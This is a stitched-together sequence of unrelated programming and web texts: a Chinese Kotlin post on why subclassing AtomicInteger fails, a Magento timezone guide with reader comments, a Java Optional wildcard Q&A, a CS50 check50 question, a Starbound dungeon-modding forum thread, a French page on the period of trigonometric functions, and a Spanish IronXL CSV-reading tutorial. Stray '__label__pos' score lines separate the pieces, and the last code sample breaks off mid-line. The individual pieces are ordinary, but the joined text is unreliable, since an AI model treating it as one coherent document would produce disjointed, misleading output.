1. 人生自古哪儿没坑 作为一个用了两年 Kotlin 的人,最近越来越控制不住自己,于是乎各种 Java 代码都开始变成 Kt,于是,也就发现了更多好玩的东东~ 话说呀,有个叫做 Retrofit 的框架,它呢有个叫 CallAdapter 的东西,其中有个 RxJava 版本的实现,让某一个类继承 AtomicInteger 来存储一个线程安全的状态值,如果大家有兴趣的话,可以去看下这个类:CallArbiter.java 而我呢,最近在闲暇时间仿照 Retrofit 写了一个叫做 RetroApollo 的项目,这个项目主要是对 Apollo-Android 这个项目做了封装,让我们更方便的访问 GraphQL Api,这其中呢,就涉及到对 RxJava 的支持了。 我当时就想,我也搞一个 CallArbiter 吧,只不过我是用 Kotlin 写的,显然根据以往的经验,Kotlin 根本就不会是什么问题好嘛,结果刚开个头就傻眼了: 1 2 3 4 class CallArbiter: AtomicInteger{ //错误!你有三个方法需要实现! constructor(initialValue: Int) : super(initialValue) constructor() : super() } 就这么一段代码,打死我都想不到居然会报错,报错理由也挺逗: Error:(8, 1) Kotlin: Class ‘CallArbiter’ must be declared abstract or implement abstract base class member public abstract fun toByte(): Byte defined in java.util.concurrent.atomic.AtomicInteger 这哪儿跟哪儿呢你说,AtomicInteger 人家本身就是一个具体的类啊,哪儿来的没实现的方法呢?这错误报的虽然是说没有实现 toByte 方法,可仔细观察一下就会发现,没实现的方法居然还有 toShorttoChar。。 2. 此坑真是久长时啊 我以为这是在逗我玩呢,毕竟看了下 AtomicInteger 和它的父类 Number,找了半天也没有找到所谓的 toByte 方法啊。 不过这方法名咋看着这么眼熟呢,好像 Kotlin 里面所有的数都有这个方法吧,追查了一下 Kotlin 源码,居然发现 Kotlin 自己有个叫 Number 的抽象类! 1 2 3 4 5 6 7 8 9 public abstract class Number { public abstract fun toDouble(): Double public abstract fun toFloat(): Float public abstract fun toLong(): Long public abstract fun toInt(): Int public abstract fun toChar(): Char public abstract fun toShort(): Short public abstract fun toByte(): Byte } 所以会不会哪些所谓的没有实现的抽象方法都是来自这个 Number 的? 这还用猜?必然是啊,不过这事儿也有点儿奇怪了,毕竟 AtomicInteger 继承的可是 java.lang.Number,Kotlin 和 Java 中的这两个 Number 之间有什么关系么? 3. 解密时刻 我之前很早的时候就写过一篇文章 为什么不直接使用 Array 而是 IntArray ? 提到了 Kotlin 类型到 Java 类型的映射问题,这里我们其实也是遇到了相同的问题。 kotlin.Number 编译后映射成了 java.lang.Number,也就是说,AtomicInteger 在 Kotlin 当中被认为是 kotlin.Number 的子类,而巧了,toByte 这样的方法在 AtomicIntegerjava.lang.Number 当中都没有具体实现,这就导致了前面的情况发生。 不过这里还是有问题的,Java 中的 Number 有类似 doubleValue 这样的方法,Kotlin 当中的 toDouble 与之有何关系? 我们定义这么一个类继承自 Kotlin 的 Number 1 2 3 4 5 6 7 8 9 class MyNumber: Number(){ override fun toByte(): Byte { ... } override fun toChar(): Char { ... } override fun toDouble(): Double { ... } override fun toFloat(): Float { ... } override fun toInt(): Int { ... } override fun toLong(): Long { ... } override fun toShort(): Short { ... } } 编译之后看看字节码就会发现,编译器自动为我们合成了 Java 中 Number 对应的方法,例如 doubleValue 1 2 3 4 5 6 7 8 9 // access flags 0x51 public final bridge doubleValue()D L0 LINENUMBER 19 L0 ALOAD 0 INVOKEVIRTUAL test/TestNumber.toDouble ()D DRETURN MAXSTACK = 2 MAXLOCALS = 1 而这个 doubleValue 正是转而去调用了 toDouble 这个方法! 好,那么前面一直出问题的 toByte 呢?也是一样,生成了一个叫做 byteValue 的方法,然后去调用了 toByte 等等!!这里有问题!人家 Java 中 NumberbyteValue 方法是有实现的!你这样不是把人家原来的实现给搞没了么。。 java.lang.Number 1 2 3 public byte byteValue() { return (byte)intValue(); } 嗯啊,是没了。。。除了这个之外,还有一个 shortValue,这二位都在 Java 中默认调用了 intValue,在 Kotlin 当中则被要求单独实现(toByte/toShort),于是乎我们想要继承 AtomicInteger 就得实现这两个方法。 至于 toChar,这个在 Java 的 Number 版本中没有对应的 charValue,所以我们也得自己实现咯。 4. 小结 经过上面的讨论,我们知道了 Kotlin 和 Java 之间存在各式各样的类型和方法的映射,为了兼容 Java 而又保持自己独特的风格,Kotlin 显然不得不这样做,相比其他语言,它也是做得比较不错的。 而对于我们遇到的问题,从逻辑上讲,AtomicInteger 这个类不应该是 open 的,我们继承它和把它作为一个组件进行组合实际上是没有区别的,对于组合就可以解决的问题,就不应该使用继承。换句话说,文章开头的代码正确的写法应该是: 1 2 3 4 5 class CallArbiter<T>{ val atomicState = AtomicInteger(STATE_WAITING) ... } 关注公众号 Kotlin ,获取最新的 Kotlin 动态。
__label__pos
0.981557
Guide through Magento’s timezones Featured Image I’ll guide you through Magento’s timezone behavior, as I’ve noticed that people tend to get confused in cases when they have 2 or more websites with different timezones. If this is what you are searching for, read on! First of all, let’s start with the Web server – Magento relation, and their times. Web server – Magento relation Let’s look at the following scenario. You want an online store – ok, you’ll need a web hosting for it (on some web hosting providers server). With classic low-level PHP development people tend to overlook server’s settings, and each server has it’s own time and timezone set. If you overlook that, each time your script executes any of time functions, it will take server time as actual one. So first thing you need to look at, is server location, and its time zone. In case of Magento, the situation is a bit different. Let’s take a look at index.php (first executed PHP file on server): Mage::run($mageRunCode, $mageRunType); And that line starts Magento initialization. Now, let’s move forward, to app/Mage.php file. In there, you’ll find this: self::$_app->run(array( 'scope_code' => $code, 'scope_type' => $type, 'options' => $options, )); After we trace it a bit more, we’ll come across this method: //File: "app/code/core/Mage/Core/Model/App.php" /** * Initialize PHP environment * * @return Mage_Core_Model_App */ protected function _initEnvironment() { $this->setErrorHandler(self::DEFAULT_ERROR_HANDLER); //Sets the default timezone used by all date/time functions in a script //Mage_Core_Model_Locale::DEFAULT_TIMEZONE = 'UTC' by default date_default_timezone_set(Mage_Core_Model_Locale::DEFAULT_TIMEZONE); return $this; } Oh look, Magento sets script’s time relative to server time, converted to UTC. So each Magento store (database-wise) is synced to UTC. Someone might ask why should we do this, and why wouldn’t we just set it to timezone that suits our needs. Well, it’s a good question – but the answer is better: If you have your Magento installation on cloud for example, or even on come cluster, it will help with cross-server synchronization as “UTC stands for Coordinated Universal Time” and pretty much each configuration of each server considers that as a default, if not set otherwise. Now, this explains how Magento gets / calculates timezone. Moving on to Magento Per Store Timezone Settings If you navigate to “System->Configuration->General->Locale Options->Timezone” in Admin area of Magento, you’ll see that you can change Timezone for each Website you have. This way you get a way to have stores for each part of the world set with correct timezone. Here’s a method used to fetch current time per store (Zend_Date instance): //File: "app/code/core/Mage/Core/Model/Locale.php" /** * Create Zend_Date object with date converted to store timezone and store Locale * * @param mixed $store Information about store * @param string|integer|Zend_Date|array|null $date date in UTC * @param boolean $includeTime flag for including time to date * @return Zend_Date */ public function storeDate($store=null, $date=null, $includeTime=false) { $timezone = Mage::app()->getStore($store)->getConfig(self::XML_PATH_DEFAULT_TIMEZONE); $date = new Zend_Date($date, null, $this->getLocale()); $date->setTimezone($timezone); if (!$includeTime) { $date->setHour(0) ->setMinute(0) ->setSecond(0); } return $date; } Or if you need string representation, just use this: /** * Date and time format codes */   /* const FORMAT_TYPE_FULL = 'full'; const FORMAT_TYPE_LONG = 'long'; const FORMAT_TYPE_MEDIUM= 'medium'; const FORMAT_TYPE_SHORT = 'short'; */   Mage::helper('core')->formatTime($time=null, $format='short', $showDate=false);   //Or "$this->helper('core')->formatTime($time=null, $format='short', $showDate=false);" Front-end and Back-end views On back-end you’ll always see times shown as configured on “System->Configuration->General->Locale Options->Timezone” for “Default” scope (usually set to Admin’s timezone). Example where you can see tis is on order views page. And each time shown on front-end will be shown as configured on same place, but on website scope. Although there aren’t may places on front-end where exact time is shown, it’s important for dates (if you have limited time offers for example), or for Cron tasks set for specific stores (newsletter sending etc.). Conclusion As I’ve mentioned at the very beginning of this article. This all applies to single-store setup as well, but it is of a HUGE importance if you have multi-store setup. If it’s set incorrectly it might lead to some “ghost bugs”, and it’s quite hard to trace – especially if you (developer) don’t understand how exactly it works. I hope I’ve cleared few things here. And thanks for reading! P.S. If you notice some strange behavior of time related stuff, please submit it here to comments! 4 comments 1. I am having the same issue with my custom dashboard. Why would they not at least store the local timezone date in the DB. Please help us Inchoo this is taking away from my sleep :). 2. Hi there. I’ve added a new datetime column at sales_flat_order, but everytime a new registry is inserted, it is shown 3 hours less than the real time. So, when seeing my sales order grid the time appears wrong, but when see it on the sales order view on html, getting the value from db, it looks good. =/ My timezone at the config is ok, and also at php.ini. Do you know what it could be wrong? Thanks 1. I guess this is because Magento messes up its own timezone behaviour. I am currently fighting against the Log Module. Sometimes the now() $this->setData('last_visit_at', now()); method is used and sometime the GMT $data = new Varien_Object(array( 'quote_id' => (int) $visitor->getQuoteId(), 'visitor_id' => (int) $visitor->getId(), 'created_at' => Mage::getSingleton('core/date')->gmtDate() )); is used. And overall Magento stores everthing as TIMESTAMP without checking the mysql timezone settings. So we have a UTC time that goes to a timestamp (thats internally is UTC) that will be treated as local time by mysql. Why could not simply use sql NOW() for that? MySQL stores as UTC and everthing would be fine. If Magento needs UTC it can load via SQL: CONVERT_TZ(`timestamp_field`, @@session.time_zone, '+00:00') AS `utc_datetime`. I am really pissed of because a lot of statistics is simply garbarge. Leave a Reply Your email address will not be published. Required fields are marked * You may use these HTML tags and attributes: <a href="" title=""> <blockquote cite=""> <code> <del datetime=""> <em> <s> <strike> <strong>. You may use following syntax for source code: <pre><code>$current = "Inchoo";</code></pre>.
__label__pos
0.778924
Wildcard extending final Optional class The Optional class is declared as final in Java. Nevertheless, it contains two methods, flatMap and or with the following signatures: public <U> Optional<U> flatMap​(Function<? super T,​ ? extends Optional<? extends U>> mapper) and public Optional<T> or​(Supplier<? extends Optional<? extends T>> supplier) Optional can never be extended, so what is the point of the parts like ? extends Optional<...> in these signatures? Why not just Optional<...> ? From answers to a similar question here about the final String class I only understood that the compiler doesn’t have to reject such constructs. I agree with that, considering the examples that were given. But my question is rather focused on API design, not on the compiler ability to predict all possible use cases. Why did some ever need to allow for the possibility of, for example, a Supplier that yields instances of some impossible class extending Optional? Answer The class Optional is final, hence can not have subclasses, but it is generic, hence allows an infinite number of parameterized types having subtyping relationships on their own. For example, the following code is only valid due to the signature you’ve shown in the question: Optional<Object> o = Optional.empty(); Supplier<Optional<String>> s = () -> Optional.of("str"); Optional<Object> combined = o.or(s); An Optional<String> is not a subtype of Optional<Object>, so Optional<? extends T> is required in the signature, as an Optional<String> is a subtype of Optional<? extends Object>. But a Supplier<Subtype> is not a subtype of Supplier<Supertype>, so we need Supplier<? extends Supertype> to allow a supplier of the subtype whereas Optional<? extends T> is the supertype here. So Supplier<Optional<String>> is a subtype of Supplier<? extends Optional<? extends Object>>. Leave a Reply Your email address will not be published. Required fields are marked *
__label__pos
0.951941
0 enter image description here When I check50 mario.c I get massage "Ensure you have the required files before submitting." But I`m shure I have the required file. What did I do wrong? 1 The directory is wrong. You are supposed to call check50 from the directory where mario.c is located. So cd into ~/workspace/pset1/mario/less and try it again. BTW, this looks like a solution to mario.more, not mario.less. mario.more does not expect spaces at the end of the lines! 1 You must log in to answer this question. Not the answer you're looking for? Browse other questions tagged .
__label__pos
0.534711
Is there any conditional structure we can use in a button command? I'm trying to change creation date based on modification date in several files. I have to set creation date = modification date only if creation is newer because I've found strange things like a file modified before it was even created (issues with copying files, changing metadata, etc.) I have then to set the creation date based on modification date. For this I need a if-then-else structure. Pseudo-code on a button will be something like this (if creation date is newer that modification date then set creation = to modify date) otherwise leave as it is. If META createdate > META modifydate SetAttr META createdate:modifydate End If Thanks in advance! Scripting is what you want.
__label__pos
0.998972
Modding Discussion want to make modded dungeon Discussion in 'Starbound Modding' started by KRANOT, Apr 8, 2017. 1. KRANOT KRANOT Big Damn Hero so i wanted to add a dungeon to a mod i am working on, how do i exactly do this? like how do i make it so that an area on a planet is the dungeon, how do i package that in a mod, how ro i protect the blocks so players dont cheat, how do i spawn enemys? are there any guides that can answere these questions?   2. Sparklink Sparklink Pangalactic Porcupine First you are going to need a map editor, I use Tiled in all of map making. There is also a great guide to using Tiled on Starbounder written by the person who made the Starbound dungeons. Then you will have to patch your dungeon into the terrestrial_worlds.config like this "[ { "op": "add", "path": "/planetTypes/forest/layers/surface/dungeons/-", "value": [ 1.0, "{dungeon name here}" ] } ] planetTypes/ determines the biome it will appear in. layers/ determines where on a type of planet it will appear (on the surface, underground, in the atmosphere). If you want to make your dungeon appear on more than one type of planet you will have to write the example I have up there for every biome.   3. projectmayhem projectmayhem Ketchup Robot I'm following that Tiled guide you linked, and after downloading the example mission, putting it in the mods folder, when I try to open the JSON in Tiled, it says Tile used but no tilesets specified. Any idea why?   4. Sparklink Sparklink Pangalactic Porcupine While I cannot figure out why it says it can not find any specified tile sets I have found that it is fixed by placing the .json file into the dungeons folder in your unpacked assets.   5. projectmayhem projectmayhem Ketchup Robot I moved the whole examplemissions folder over, but it still says the same thing   6. Sparklink Sparklink Pangalactic Porcupine Move only the .json file. Sorry about being unclear.   7. projectmayhem projectmayhem Ketchup Robot I tried that first. It didnt work. So...here is what I figured I would try. I went into the unpacked assets and copied dungeons/other/museum.json and dungeonfile. I tried opening it and I get the same error. I can open the museum file in the unpacked assets just fine, but not if I copy it and move it to my mods folders. I get that same tileset not specified error. I noticed this at the bottom of the JSON... Code: "tilesets":[ { "firstgid":1, "source":"..\/..\/..\/tilesets\/packed\/materials.json" }, { "firstgid":191, "source":"..\/..\/..\/tilesets\/packed\/supports.json" }, { "firstgid":227, "source":"..\/..\/..\/tilesets\/packed\/miscellaneous.json" }, { "firstgid":247, "source":"..\/..\/..\/tilesets\/packed\/liquids.json" }, { "firstgid":275, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/generic.json" }, { "firstgid":2039, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/apex.json" }, { "firstgid":2407, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/avian.json" }, { "firstgid":2711, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/floran.json" }, { "firstgid":2906, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/glitch.json" }, { "firstgid":3131, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/human.json" }, { "firstgid":3410, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/hylotl.json" }, { "firstgid":3641, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/decorative.json" }, { "firstgid":4941, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/door.json" }, { "firstgid":5057, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/furniture.json" }, { "firstgid":5383, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/light.json" }, { "firstgid":5800, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/pot.json" }, { "firstgid":6097, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/storage.json" }, { "firstgid":6315, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/teleporter.json" }], I assume that points to the tilesets, I don't know much about JSON, so no idea how to read those paths. Do any of them need changed?   8. Sparklink Sparklink Pangalactic Porcupine Yes those point to the tilesets that you build with. If the examplemission.json in the tutorial you can probably swap it out for blank template dungeon that is in the dungeons folder, all you need to do is simply copy it an rename it.   9. projectmayhem projectmayhem Ketchup Robot ok I think I may have figured out whats wrong, I mae my own custom map, just threw some dirt on it. Then saved it. When I open up the JSON, the paths look like this... "source":"..\/..\/..\/assets\/packed\/tilesets\/packed\/materials.json" So if I add /assets\/packed\ before the tilesets on the other json, it should open, going to try that now   10. projectmayhem projectmayhem Ketchup Robot Well wait...if I specifically set it to look in the unpacked assets, it won't work for people who haven't unpacked the assets will it? *edit* Or does the packed in the file path mean the packed.pak file. in the tutorial it said to make sure your unpacked assets is renamed to packed. Mine was called _unpacked when I first unpacked it.   11. projectmayhem projectmayhem Ketchup Robot I can get the copied museum file to load, if i put it in my dungeon folder, with the path ..\/..\/..\/assets\/packed\/tilesets\/packed\tilesetname.json but will it still work for everyone else?   12. Sparklink Sparklink Pangalactic Porcupine The tiles and objects placed are saved and should work across all who use the mod.   projectmayhem likes this. 13. projectmayhem projectmayhem Ketchup Robot Ok, thank you :) Gonna try making a custom instanced area, access-able from the ships tech station panel. I think I saw a tutorial for that somewhere. Then hopefully, change my custom quest from auto-complete to "must turn in" at an NPC inside the instance. Hopefully it goes well!   14. projectmayhem projectmayhem Ketchup Robot Hmm... made it simple, just the outline of the building, one NPC, a teleporter and the Player Start. I got this error message "Caused by: (MapException) Key 'default' not found in Map::get()" Any idea what that means? tried looking on forums but all I found was an old old old post that didnt help. **edit** I used the /warp instanceworld:jeditemple to get there, not sure if that matters. I wasn't sure if you had to do anything special to make your area an instanced world. Do I have to add tags anywhere in the JSON?   15. Sparklink Sparklink Pangalactic Porcupine Did you make sure that the instance_worlds.config.patch, the dungeon_worlds.config.patch and the .dungeon files were all correct? The .dungeon should properly refer to the .json file and the instance and dungeon worlds should refer to the .dungeon file correctly.   16. projectmayhem projectmayhem Ketchup Robot Yeah, they are fine. I went ahead and recopied the museum files, renamed them and repathed the tilesets. Its letting me go into it fine, so I'm just going to redesign it, and go from there. I can't find any info on adding a warp/mission to the tech station. Do you know any tutorial or file I can look at it get pointed in the right way?   17. projectmayhem projectmayhem Ketchup Robot I think I have most everything now. I just gotta learn how to make picking up my Kyber Crystal activate the mission on the AI Tech Station.   18. projectmayhem projectmayhem Ketchup Robot Ok the only issues I am having now, is looking in the LUA file, im trying to edit it to suit my needs and learn a little about what I'm doing. There is a line in the humanmission1.lua that says self.mechanicUid = config.getParameter("mechanicUid") and then it's referenced later on with local findMechanic = util.uniqueEntityTracker(self.mechanicUid, self.compassUpdate) So, what file do I need to look at to learn about the Uid and where it gets set. I have some NPC's in my jedi temple, I just need to learn how to set one of them as the turn in NPC with this Uid right? *Edit* That came out wrong, I know where you set the Uid, I have it in my jeditemple.questtemplate "jediUid" : "jediknight", I just don't know where to go to set one of my NPC as "jediknight" **Edit Again** Ok, After posting this I had an idea and I think it turned right. In the human mission the shipyardcaptain is the turn in, and I been looking through NPC files for him and mission files and all that..but he is in the objects file. So, going to make a jediknight object and try to get the quest to turn in to him ***Yet Another Edit*** I guess in order to get the Jedi Knight Object into the map, I would have to learn how to make a new tileset, to upload to the Tiled   Last edited: Apr 17, 2017 Share This Page
__label__pos
0.729
... View Full Version : recursion function problem o0O0o.o0O0o 01-23-2008, 12:51 AM hi i am using recursion function to display the tree based menu. Initially i was echoing it line by line and it worked fine but now i want to append the output to variable function (parentid , depth) { $display . = ... function(parentid,depth) ...... } Now i want is that when the function finishes it returns the ouput But how can i made the check that function has reached the last menu and now it should return the $display not anywhere in between Fou-Lu 01-23-2008, 02:03 AM Not sure what you are looking at doing, since you don't have any conditional control in your example. At the 'end' of a function you return the result, once it reaches the end the recursive 'stack', it will step up each time and return the result. Generally if you want to return a result from a recursive function you would append a result from a function call within the function, or run against a static variable. For example: function recurseSomething($something) { $result = ''; if (is_array($something)) { foreach($something AS $nothing) { $result .= recurseSomething($nothing); } } else if (is_string($something)) { $result .= strtoupper($something); } return $result; } Recursion is all about the conditions you have placed upon it. Without knowing that, I can't really recommend exactly what you should do to preform a result. Remember, you can always run against a static variable which is a reference to a calling scoped variable - that will actually eliminate your need to perform a return. EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum
__label__pos
0.64183
Rechercher un outil Période d'une Fonction Outil pour calculer la période d'une fonction. La période d'une fonction est la plus petite valeur t telle que la fonction se répête f(x+t)=f(x-t)=f(x), ce qui est le cas des fonctions trigo (cos, sin, etc.). Résultats Période d'une Fonction - Catégorie(s) : Fonctions Partager Partager dCode et plus dCode est gratuit et ses outils sont une aide précieuse dans les jeux, les maths, les énigmes, les géocaches, et les problèmes à résoudre au quotidien ! Une suggestion ? un problème ? une idée ? Ecrire à dCode ! Rendez-vous sur notre communauté Discord pour participer au forum d'entraide ! Grâce à vos remarques, réponses et commentaires pertinents, dCode peut développer le meilleur outil 'Période d'une Fonction', alors écrivez-nous c'est gratuit ! Merci ! Période d'une Fonction Calculatrice de Période t Outil pour calculer la période d'une fonction. La période d'une fonction est la plus petite valeur t telle que la fonction se répête f(x+t)=f(x-t)=f(x), ce qui est le cas des fonctions trigo (cos, sin, etc.). Réponses aux Questions Qu'est ce qu'une période de fonction ? (Définition) La période $ t $ d'une fonction périodique $ f(x) $ est la valeur $ t $ telle que $$ f(x+t)=f(x) $$ Graphiquement, sa courbe se reproduit chaque période, par translation. La fonction est égale à elle-même toutes les longueurs $ t $ (elle présente un motif qui se répète par translation). La valeur de la période $ t $ est aussi appelée périodicité d'une fonction. Comment déterminer la période d'une fonction ? Pour trouver la période $ t $ d'une fonction périodique $ f(x) $, montrer que $$ f(x+t)=f(x) $$ Exemple : La fonction trigonométrique $ \sin(x + 2\pi) = \sin(x) $ donc $ \sin(x) $ est périodique de période $ 2\pi $ function-period Les fonctions trigonométriques sont généralement périodiques de période $ 2\pi $, pour deviner la valeur de $ t $, envisager des multiples de pi pour la valeur $ t $. Si la période est nulle (égale à $ 0 $), alors la fonction n'est pas périodique. Comment déterminer la valeur f(x) d'une fonction périodique ? Toute fonction périodique de période $ t $ se répète toutes les $ t $ valeurs. Pour prédire la valeur d'une fonction périodique, pour une valeur $ x $ calculer $ x_t = x \mod t $ (modulo t) et rechercher la valeur connue de $ f(x_t) = f(x) $ Exemple : La fonction $ f(x) = \cos(x) $ a une période de $ 2\pi $, la valeur pour $ x = 9\pi $ est la même que pour $ x \equiv 9\pi \mod 2\pi \equiv \pi \mod 2\pi $ et donc $ \cos(9\pi) = \cos(\pi) = -1 $ Comment déterminer l'amplitude d'une fonction ? L'amplitude correspond à la valeur absolue de la partie non périodique de la fonction. Exemple : $ a \sin(x) $ a pour amplitude $ | a | $ Comment prouver qu'une fonction n'est pas périodique ? Si $ f $ est périodique alors il existe un réel non nul tel que $$ f(x+t)=f(x) $$ La démonstration consiste à montrer que c'est impossible. Par exemple via un raisonnement par l'absurde ou en réalisant un calcul qui débouche sur une contradiction. Quelles sont les fonctions périodiques usuelles ? Les fonctions périodiques les plus courantes sont les fonctions trigonométriques à base de fonctions sinus et cosinus (qui ont une période de 2 Pi). Période de Sinus $ \sin(x) $$ 2\pi $ Période de Cosinus $ \cos(x) $$ 2\pi $ Période de Tangente $ \tan(x) $$ \pi $ Code source dCode se réserve la propriété du code source de l'outil 'Période d'une Fonction' en ligne. Sauf code licence open source explicite (indiqué CC / Creative Commons / gratuit), tout algorithme, applet ou snippet (convertisseur, solveur, chiffrement / déchiffrement, encodage / décodage, encryptage / décryptage, traducteur) ou toute fonction (convertir, résoudre, décrypter / encrypter, déchiffrer / chiffrer, décoder / encoder, traduire) codé en langage informatique (PHP, Java, C#, Python, Javascript, Matlab, etc.) aucune donnée, script ou accès API ne sera cédé gratuitement, idem pour télécharger Période d'une Fonction pour un usage hors ligne, PC, tablette, appli iPhone ou Android ! Besoin d'Aide ? Rendez-vous sur notre communauté Discord pour participer au forum d'entraide ! Questions / Commentaires Grâce à vos remarques, réponses et commentaires pertinents, dCode peut développer le meilleur outil 'Période d'une Fonction', alors écrivez-nous c'est gratuit ! Merci ! Source : https://www.dcode.fr/periode-fonction © 2021 dCode — La 'boite à outils' indispensable qui sait résoudre tous les jeux / énigmes / géocaches / CTF. Un problème ?
__label__pos
0.652948
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. What would be the MQL query if I want to search for a property that has a particular string either in its name or the actual link path. For name, I was able to put a ~= matching on the name property, but not in the link path. I tried to use the ~= in the id, but it says we cannot do matching in the id. [{ "/type/object/id": "wikipedia", "name~=": "wikipedia", "/type/object/type": "/type/property", "/type/object/name": null "limit": 200 }]​ Is there a way to also search for strings in the id ? share|improve this question 1 Answer 1 up vote 1 down vote accepted A couple of things: • the ~= operator works on a whole word basis, so if you want to find the string "wikipedia" in all contexts, you'll want to use "*wikipedia*" • IDs aren't stored with fully formed paths, instead they're a sequence of keys in their respective namespaces (think filenames in directories) You'll need two separate queries to match both the properties and their containing domains since you can't do unions like that in MQL. For properties who's names contain wikipedia: [{ "type": "/type/property", "name~=" : "*wikipedia*", "name": null, "id":null, "limit": 200 }]​ and for properties which belong to types who's IDs contain wikipedia: [{ "type": "/type/property", "name": null, "id":null, "schema" : {"key":{"namespace":{"name~=":"*wikipedia*"}},"id":null}, "limit": 200 }]​ That second query may need a little refinement, but it should give you the basic idea. share|improve this answer      If the original comment about wildcards didn't make any sense, it's because the markup ate my asterisks. I've restored them to the text. –  Tom Morris Nov 28 '12 at 22:04      Thanks Tom! that helps. –  Abhishek Shivkumar Nov 29 '12 at 4:45 Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.630927
W3cubDocs /SVG width This attribute indicates an horizontal length in the user coordinate system. The exact effect of this coordinate depends on each element. Most of the time, it represents the width of the rectangular region of the reference element (see each individual element's documentation for exceptions). This attribute must be specified except for the <svg> element where the default value is 100% (except for root <svg> elements that have HTML parents) and the <filter> and <mask> elements where the default value is 120%. Usage context <length> A length is a distance measurement, given as a number along with a unit. Lengths are specified in one of two ways. When used in a stylesheet, a <length> is defined as follows: length ::= number (~"em" | ~"ex" | ~"px" | ~"in" | ~"cm" | ~"mm" | ~"pt" | ~"pc")? See the CSS2 specification for the meanings of the unit identifiers. For properties defined in CSS2, a length unit identifier must be provided. For length values in SVG-specific properties and their corresponding presentation attributes, the length unit identifier is optional. If not provided, the length value represents a distance in the current user coordinate system. In presentation attributes for all properties, whether defined in SVG1.1 or in CSS2, the length identifier, if specified, must be in lower case. When lengths are used in an SVG attribute, a <length> is instead defined as follows: length ::= number ("em" | "ex" | "px" | "in" | "cm" | "mm" | "pt" | "pc" | "%")? The unit identifiers in such <length> values must be in lower case. Note that the non-property <length> definition also allows a percentage unit identifier. The meaning of a percentage length value depends on the attribute for which the percentage length value has been specified. Two common cases are: • when a percentage length value represents a percentage of the viewport width or height • when a percentage length value represents a percentage of the bounding box width or height on a given object. In the SVG DOM, <length> values are represented using SVGLength or SVGAnimatedLength objects. Example <?xml version="1.0"?> <svg width="120" height="120" viewBox="0 0 120 120" xmlns="http://www.w3.org/2000/svg"> <rect x="10" y="10" width="100" height="100"/> </svg> Elements The following elements can use the width attribute © 2005–2018 Mozilla Developer Network and individual contributors. Licensed under the Creative Commons Attribution-ShareAlike License v2.5 or later. https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/width
__label__pos
0.755084
USO DE IRONXL Leer Archivo CSV Usando C# (Tutorial de Ejemplo de Código) Actualizado junio 29, a. m. Compartir: Este tutorial demuestra cómo leer un archivo CSV usando la librería IronXL C# sin instalar interoperabilidad adicional, de una manera altamente eficiente y efectiva. Cómo leer archivos CSV en C# Primero debe instalar IronXL antes de utilizarlo para leer archivos CSV en MVC, ASP.NET o .NET Core. He aquí un resumen básico del proceso. Seleccione el menú Proyecto en Visual Studio, Administrar paquetes NuGet, y Buscar IronXL.Excel, e Instalar. Leer archivo CSV usando C# (Tutorial de ejemplo de código), Figura 1: Instalar el paquete IronXL en el gestor de paquetes NuGet Instale el paquete IronXL en el gestor de paquetes NuGet. IronXL es una gran herramienta que puede utilizar cuando necesite leer archivos CSV en C#. El siguiente ejemplo de código muestra que puede leer un archivo CSV utilizando comas u otro delimitador. WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; workbook.SaveAs("Csv_To_Excel.xlsx"); WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; workbook.SaveAs("Csv_To_Excel.xlsx"); Dim workbook As WorkBook = WorkBook.LoadCSV("Weather.csv", fileFormat:= ExcelFileFormat.XLSX, ListDelimiter:= ",") Dim ws As WorkSheet = workbook.DefaultWorkSheet workbook.SaveAs("Csv_To_Excel.xlsx") VB   C# Leer archivo CSV con C# (Tutorial de ejemplo de código), Figura 2: Datos CSV para este tutorial **Datos en formato CSV para este tutorial El objeto Libro de trabajo se crea. El objeto `WorkBook CargarCSV se utiliza para indicar el nombre del archivo CSV, su formato y los delimitadores utilizados en el archivo CSV que se está leyendo, que se almacenan como una matriz de cadenas. Las comas se utilizan como delimitadores en este escenario. Después de eso, un Hoja de trabajo se crea el objeto; aquí es donde se almacenará el contenido del archivo CSV. A continuación, se cambia el nombre del archivo y se almacena en un nuevo formato. A continuación, los datos del archivo CSV se ordenan en la hoja de cálculo en forma de tabla. El resultado será algo parecido a esto: Lectura de archivos CSV mediante C# (Tutorial de ejemplo de código), Figura 3: Datos convertidos en archivo Excel Datos convertidos en fichero Excel Análisis sintáctico de CSV en C# .NET Los CSV tienen varios problemas con el tratamiento de los saltos de línea en los campos y con el hecho de que los campos puedan ir entre comillas, lo que impide que funcione una simple técnica de división de cadenas Split("'"). En su lugar, IronXL ofrece personalizar el delimitador utilizando un parámetro opcional del método LoadCSV, consulte la documentación de la API de CargarCSV para más detalles. C# Registros - Lectura de datos CSV En el ejemplo siguiente, el foreach se utiliza para recorrer las filas del archivo CSV, y la Consola se utiliza para escribir los datos en un registro. WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: ExcelFileFormat.XLSX, ListDelimiter: ","); WorkSheet ws = workbook.DefaultWorkSheet; DataTable dt = ws.ToDataTable(true);//parse sheet1 of sample.xlsx file into datatable foreach (DataRow row in dt.Rows) //access rows { for (int i = 0; i < dt.Columns.Count; i++) //access columns of corresponding row { Console.Write(row [i] + " "); } Console.WriteLine(); } WorkBook workbook = WorkBook.LoadCSV("Weather.csv", fileFormat: 